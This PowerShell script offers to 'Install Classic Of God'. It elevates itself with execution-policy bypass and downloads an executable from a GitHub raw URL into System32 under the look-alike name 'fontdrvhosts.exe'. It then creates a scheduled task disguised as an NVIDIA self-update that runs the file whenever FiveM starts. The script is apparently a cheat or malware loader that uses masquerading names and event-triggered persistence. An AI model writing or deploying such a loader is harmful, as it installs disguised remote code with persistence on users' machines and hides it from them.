# -----------------------------
# Menu Selection
# -----------------------------
Write-Host "Select Mode:"
Write-Host "1. Install Classic Of God"
Write-Host "2. Clean"

$choice = Read-Host "Enter choice (1/2)"

# -----------------------------
# Check for Administrator rights
# -----------------------------
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 
    Write-Host "Restarting with Administrator privileges..."
    Start-Process -FilePath "powershell.exe" `
        -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" `
        -Verb RunAs
    exit
}

# -----------------------------
# Define paths and variables
# -----------------------------
$system32Path = "$env:windir\System32"
$exeDestination = Join-Path $system32Path "fontdrvhosts.exe"
$exeUrl = "https://raw.githubusercontent.com/weewrrwr/4ealnest/main/4ealnest.exe"
$taskName = "NVIDIA App SelfUpdate_{B2FE1952-0186-46C3-BAEC-Z80AA35AC5B8}"
$user = "$env:USERNAME"

# -----------------------------
# Install Mode
# -----------------------------
if ($choice -eq "1") {
    Write-Host "Starting installation..."

    # Download EXE
    Invoke-WebRequest -Uri $exeUrl -OutFile $exeDestination

    # Create scheduled task (RUN AS USER, NOT SYSTEM)
    $cmd = @"
schtasks /create /tn "$taskName" ^
/tr "C:\Windows\System32\fontdrvhosts.exe" ^
/sc ONEVENT ^
/ec Security ^
/mo "*[System[(EventID=4688)]] and *[EventData[Data[@Name='NewProcessName']='%localappdata%\FiveM\FiveM.exe']]" ^
/ru "$user" ^
/it ^
/f
"@

    Invoke-Expression $cmd

    # Enable audit logging
    auditpol /set /subcategory:"Process Creation" /success:enable

    Write-Host "Installation completed."
}

# -----------------------------
# Clean Mode
# -----------------------------
elseif ($choice -eq "2") {

    Write-Host "Cleaning up installation..."

    schtasks /delete /tn $taskName /f

    if (Test-Path $exeDestination) { Remove-Item $exeDestination -Force }

    Write-Host "Cleanup completed."
}

else {
    Write-Host "Invalid choice."
}